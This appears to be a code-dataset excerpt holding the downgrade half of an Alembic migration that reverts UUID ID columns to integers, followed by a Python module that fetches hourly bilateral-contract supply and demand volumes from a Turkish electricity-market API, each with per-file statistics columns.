existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tagged_by_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"tagged_item_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Tags", schema=None) as batch_op:
batch_op.alter_column(
"tag_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Tasks", schema=None) as batch_op:
batch_op.alter_column(
"parent_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
existing_nullable=False,
)
batch_op.alter_column(
"task_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("UnitTypes", schema=None) as batch_op:
batch_op.alter_column(
"unit_type_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
with op.batch_alter_table("Users", schema=None) as batch_op:
batch_op.alter_column(
"user_id",
existing_type=sa.INTEGER(),
type_=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Users", schema=None) as batch_op:
batch_op.alter_column(
"user_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("UnitTypes", schema=None) as batch_op:
batch_op.alter_column(
"unit_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Tasks", schema=None) as batch_op:
batch_op.alter_column(
"task_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"parent_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("Tags", schema=None) as batch_op:
batch_op.alter_column(
"tag_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("TaggedItems", schema=None) as batch_op:
batch_op.alter_column(
"tagged_item_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"tagged_by_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"tag_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"item_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("Synonyms", schema=None) as batch_op:
batch_op.alter_column(
"synonym_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"entity",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("States", schema=None) as batch_op:
batch_op.alter_column(
"state_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
with op.batch_alter_table("Sensors", schema=None) as batch_op:
batch_op.alter_column(
"sensor_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"host",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("SensorTypes", schema=None) as batch_op:
batch_op.alter_column(
"sensor_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Privacies", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Platforms", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"platform_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"nationality_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("PlatformTypes", schema=None) as batch_op:
batch_op.alter_column(
"platform_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Participants", schema=None) as batch_op:
batch_op.alter_column(
"task_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"participant_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Nationalities", schema=None) as batch_op:
batch_op.alter_column(
"nationality_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("MediaTypes", schema=None) as batch_op:
batch_op.alter_column(
"media_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Media", schema=None) as batch_op:
batch_op.alter_column(
"subject_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"media_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"media_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("LogsHoldings", schema=None) as batch_op:
batch_op.alter_column(
"unit_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"logs_holding_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"commodity_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("Logs", schema=None) as batch_op:
batch_op.alter_column(
"log_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"change_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("HostedBy", schema=None) as batch_op:
batch_op.alter_column(
"subject_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"hosted_by_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"host_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("GeometryTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("GeometrySubTypes", schema=None) as batch_op:
batch_op.alter_column(
"geo_sub_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Geometries", schema=None) as batch_op:
batch_op.alter_column(
"task_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"subject_platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"geometry_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
batch_op.alter_column(
"geo_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"geo_sub_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
with op.batch_alter_table("Extractions", schema=None) as batch_op:
batch_op.alter_column(
"extraction_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Datafiles", schema=None) as batch_op:
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"datafile_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"datafile_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("DatafileTypes", schema=None) as batch_op:
batch_op.alter_column(
"datafile_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Contacts", schema=None) as batch_op:
batch_op.alter_column(
"subject_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"contact_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("ContactTypes", schema=None) as batch_op:
batch_op.alter_column(
"contact_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("ConfidenceLevels", schema=None) as batch_op:
batch_op.alter_column(
"confidence_level_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("CommodityTypes", schema=None) as batch_op:
batch_op.alter_column(
"commodity_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Comments", schema=None) as batch_op:
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"platform_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"comment_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"comment_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("CommentTypes", schema=None) as batch_op:
batch_op.alter_column(
"comment_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("ClassificationTypes", schema=None) as batch_op:
batch_op.alter_column(
"class_type_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Changes", schema=None) as batch_op:
batch_op.alter_column(
"change_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
with op.batch_alter_table("Activations", schema=None) as batch_op:
batch_op.alter_column(
"source_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"sensor_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=False,
)
batch_op.alter_column(
"privacy_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
existing_nullable=True,
)
batch_op.alter_column(
"activation_id",
existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
type_=sa.INTEGER(),
)
# ### end Alembic commands ###
| 36.070175 | 82 | 0.605837 | 4,494 | 41,120 | 5.191366 | 0.028705 | 0.07261 | 0.089499 | 0.134248 | 0.986369 | 0.986369 | 0.986369 | 0.985684 | 0.980026 | 0.979211 | 0 | 0.013569 | 0.293847 | 41,120 | 1,139 | 83 | 36.101844 | 0.789889 | 0.007685 | 0 | 0.826211 | 0 | 0 | 0.063777 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001899 | false | 0 | 0.168091 | 0 | 0.169991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
361de3ce9318032cd51e024a621afa5a3e40aace | 10,769 | py | Python | seffaflik/elektrik/piyasalar/ia.py | tgbaozkn/seffaflik | b16bae9bf882ee81511c7f69428e58d22ec25600 | [
"MIT"
] | 10 | 2020-06-20T10:56:04.000Z | 2022-02-03T18:23:59.000Z | seffaflik/elektrik/piyasalar/ia.py | tgbaozkn/seffaflik | b16bae9bf882ee81511c7f69428e58d22ec25600 | [
"MIT"
] | 1 | 2022-02-01T11:31:33.000Z | 2022-02-03T20:30:01.000Z | seffaflik/elektrik/piyasalar/ia.py | tgbaozkn/seffaflik | b16bae9bf882ee81511c7f69428e58d22ec25600 | [
"MIT"
] | 6 | 2020-12-09T14:55:46.000Z | 2022-03-31T11:50:36.000Z | import pandas as __pd
import datetime as __dt
from multiprocessing import Pool as __Pool
import multiprocessing as __mp
from functools import reduce as __red
import logging as __logging
from seffaflik.__ortak.__araclar import make_requests as __make_requests
from seffaflik.__ortak import __araclar as __araclar, __dogrulama as __dogrulama
from seffaflik.elektrik.uretim import organizasyonlar as __organizasyonlar
__first_part_url = "market/"
def hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), organizasyon_eic=""):
"""
İlgili tarih aralığı için ikili anlaşma arz/talep hacim bilgilerini vermektedir.
Not: "organizasyon_eic" değeri girildiği taktirde organizasyona ait saatlik arz/talep hacim bilgisini vermektedir.
Parametreler
------------
baslangic_tarihi : %YYYY-%AA-%GG formatında başlangıç tarihi (Varsayılan: bugün)
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi (Varsayılan: bugün)
organizasyon_eic : metin formatında organizasyon eic kodu (Varsayılan: "")
Geri Dönüş Değeri
----------------
Arz/Talep İkili Anlaşma Miktarları (MWh)
"""
if __dogrulama.__baslangic_bitis_tarih_eic_dogrulama(baslangic_tarihi, bitis_tarihi, organizasyon_eic):
try:
particular_url = \
__first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
bitis_tarihi + "&eic=" + organizasyon_eic
json = __make_requests(particular_url)
df_arz = __pd.DataFrame(json["body"]["bilateralContractSellList"])
particular_url = \
__first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
bitis_tarihi + "&eic=" + organizasyon_eic
json = __make_requests(particular_url)
df_talep = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
df = __araclar.__merge_ia_dfs_evenif_empty(df_arz, df_talep)
df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
df = df[["Tarih", "Saat", "Talep Miktarı", "Arz Miktarı"]]
except (KeyError, TypeError):
return __pd.DataFrame()
else:
return df
def tum_organizasyonlar_hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), hacim_tipi="NET"):
"""
İlgili tarih aralığı ve hacim tipi için tüm organizasyonların saatlik ikili anlaşma hacim bilgilerini vermektedir.
Parametreler
------------
baslangic_tarihi : %YYYY-%AA-%GG formatında başlangıç tarihi (Varsayılan: bugün)
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi (Varsayılan: bugün)
hacim_tipi : metin formatında hacim tipi ("NET", "ARZ", yada "TALEP") (varsayılan: "NET")
Geri Dönüş Değeri
-----------------
Tüm Organizasyonların İA Hacim Bilgileri (Tarih, Saat, Hacim)
"""
if __dogrulama.__baslangic_bitis_tarih_dogrulama(baslangic_tarihi, bitis_tarihi):
list_org = __organizasyonlar()[["EIC Kodu", "Kısa Adı"]].to_dict("records")
org_len = len(list_org)
list_date_org_eic = list(zip([baslangic_tarihi] * org_len, [bitis_tarihi] * org_len, list_org))
list_date_org_eic = list(map(list, list_date_org_eic))
with __Pool(__mp.cpu_count()) as p:
if hacim_tipi.lower() == "net":
list_df_unit = p.starmap(__organizasyonel_net_hacim, list_date_org_eic, chunksize=1)
elif hacim_tipi.lower() == "arz":
list_df_unit = p.starmap(__organizasyonel_arz_hacim, list_date_org_eic, chunksize=1)
elif hacim_tipi.lower() == "talep":
list_df_unit = p.starmap(__organizasyonel_talep_hacim, list_date_org_eic, chunksize=1)
else:
__logging.error("Lütfen geçerli bir hacim tipi giriniz: Net, Arz, Talep", exc_info=False)
list_df_unit = list(filter(lambda x: len(x) > 0, list_df_unit))
df_unit = __red(lambda left, right: __pd.merge(left, right, how="outer", on=["Tarih", "Saat"], sort=True),
list_df_unit)
return df_unit
def tum_gorevli_tedarik_hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), hacim_tipi="NET"):
"""
İlgili tarih aralığı ve hacim tipi için tüm organizasyonların saatlik ikili anlaşma hacim bilgilerini vermektedir.
Parametreler
------------
baslangic_tarihi : %YYYY-%AA-%GG formatında başlangıç tarihi (Varsayılan: bugün)
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi (Varsayılan: bugün)
hacim_tipi : metin formatında hacim tipi ("NET", "ARZ", yada "TALEP") (varsayılan: "NET")
Geri Dönüş Değeri
-----------------
Tüm Organizasyonların İA Hacim Bilgileri (Tarih, Saat, Hacim)
"""
if __dogrulama.__baslangic_bitis_tarih_dogrulama(baslangic_tarihi, bitis_tarihi):
org = __organizasyonlar()
org = org[(org["Adı"].str.contains("K1")) | (org["Adı"].str.contains("K2")) | (
org["Adı"].str.contains("K3"))].reset_index(drop=True)
list_org = org[["EIC Kodu", "Kısa Adı"]].to_dict("records")
org_len = len(list_org)
list_date_org_eic = list(zip([baslangic_tarihi] * org_len, [bitis_tarihi] * org_len, list_org))
list_date_org_eic = list(map(list, list_date_org_eic))
with __Pool(__mp.cpu_count()) as p:
if hacim_tipi.lower() == "net":
list_df_unit = p.starmap(__organizasyonel_net_hacim, list_date_org_eic, chunksize=1)
elif hacim_tipi.lower() == "arz":
list_df_unit = p.starmap(__organizasyonel_arz_hacim, list_date_org_eic, chunksize=1)
elif hacim_tipi.lower() == "talep":
list_df_unit = p.starmap(__organizasyonel_talep_hacim, list_date_org_eic, chunksize=1)
else:
__logging.error("Lütfen geçerli bir hacim tipi giriniz: Net, Arz, Talep", exc_info=False)
list_df_unit = list(filter(lambda x: len(x) > 0, list_df_unit))
df_unit = __red(lambda left, right: __pd.merge(left, right, how="outer", on=["Tarih", "Saat"], sort=True),
list_df_unit)
return df_unit
def __organizasyonel_net_hacim(baslangic_tarihi, bitis_tarihi, org):
"""
İlgili tarih aralığı ve organizasyon için saatlik ikili anlaşma net hacim bilgilerini vermektedir.
Önemli Bilgi
------------
Organizasyon bilgisi girilmediği taktirde toplam piyasa hacmi bilgisi verilmektedir.
Parametreler
-----------
baslangic_tarihi: %YYYY-%AA-%GG formatında başlangıç tarihi
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi
org : dict formatında organizasyon EIC Kodu, Kısa Adı
Geri Dönüş Değeri
-----------------
Net İA Miktarı (MWh)
"""
try:
particular_url = \
__first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
bitis_tarihi + "&eic=" + org["EIC Kodu"]
json = __make_requests(particular_url)
df_arz = __pd.DataFrame(json["body"]["bilateralContractSellList"])
particular_url = \
__first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
bitis_tarihi + "&eic=" + org["EIC Kodu"]
json = __make_requests(particular_url)
df_talep = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
df = __araclar.__merge_ia_dfs_evenif_empty(df_arz, df_talep)
df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
df[org["Kısa Adı"]] = df["Talep Miktarı"] - df["Arz Miktarı"]
df = df[["Tarih", "Saat", org["Kısa Adı"]]]
except (KeyError, TypeError):
return __pd.DataFrame()
else:
return df
def __organizasyonel_arz_hacim(baslangic_tarihi, bitis_tarihi, org):
"""
İlgili tarih aralığı ve organizasyon için saatlik ikili anlaşma arz hacim bilgilerini vermektedir.
Önemli Bilgi
-----------
Organizasyon bilgisi girilmediği taktirde toplam piyasa hacmi bilgisi verilmektedir.
Parametreler
----------
baslangic_tarihi: %YYYY-%AA-%GG formatında başlangıç tarihi
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi
org : dict formatında organizasyon EIC Kodu, Kısa Adı
Geri Dönüş Değeri
-----------------
Arz İA Miktarı (MWh)
"""
try:
particular_url = __first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" \
+ bitis_tarihi + "&eic=" + org["EIC Kodu"]
json = __make_requests(particular_url)
df = __pd.DataFrame(json["body"]["bilateralContractSellList"])
df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
df.rename(index=str, columns={"quantity": org["Kısa Adı"]}, inplace=True)
df = df[["Tarih", "Saat", org["Kısa Adı"]]]
except (KeyError, TypeError):
return __pd.DataFrame()
else:
return df
def __organizasyonel_talep_hacim(baslangic_tarihi, bitis_tarihi, org):
"""
İlgili tarih aralığı ve organizasyon için saatlik ikili anlaşma (İA) talep hacim bilgilerini vermektedir.
Önemli Bilgi
------------
Organizasyon bilgisi girilmediği taktirde toplam piyasa hacmi bilgisi verilmektedir.
Parametreler
------------
baslangic_tarihi: %YYYY-%AA-%GG formatında başlangıç tarihi
bitis_tarihi : %YYYY-%AA-%GG formatında bitiş tarihi
org : dict formatında organizasyon EIC Kodu, Kısa Adı
Geri Dönüş Değeri
----------------
Talep İA Miktarı (MWh)
"""
try:
particular_url = __first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" \
+ bitis_tarihi + "&eic=" + org["EIC Kodu"]
json = __make_requests(particular_url)
df = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
df.rename(index=str, columns={"quantity": org["Kısa Adı"]}, inplace=True)
df = df[["Tarih", "Saat", org["Kısa Adı"]]]
except (KeyError, TypeError):
return __pd.DataFrame()
else:
return df
| 46.619048 | 120 | 0.640449 | 1,297 | 10,769 | 5.026985 | 0.138782 | 0.052914 | 0.022086 | 0.025767 | 0.860583 | 0.843405 | 0.839724 | 0.839724 | 0.839724 | 0.839724 | 0 | 0.004195 | 0.225276 | 10,769 | 230 | 121 | 46.821739 | 0.77574 | 0.274863 | 0 | 0.766129 | 0 | 0 | 0.131445 | 0.03767 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048387 | false | 0 | 0.072581 | 0 | 0.201613 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
362d8c7d523e21fb00211fe4a9efe72f8293372d | 46 | py | Python | dace/frontend/octave/__init__.py | tbennun/dace | 484f959c847feee048cd43ae5580f57e67d51671 | [
"BSD-3-Clause"
] | 1 | 2020-09-18T07:27:22.000Z | 2020-09-18T07:27:22.000Z | dace/frontend/octave/__init__.py | tbennun/dace | 484f959c847feee048cd43ae5580f57e67d51671 | [
"BSD-3-Clause"
] | null | null | null | dace/frontend/octave/__init__.py | tbennun/dace | 484f959c847feee048cd43ae5580f57e67d51671 | [
"BSD-3-Clause"
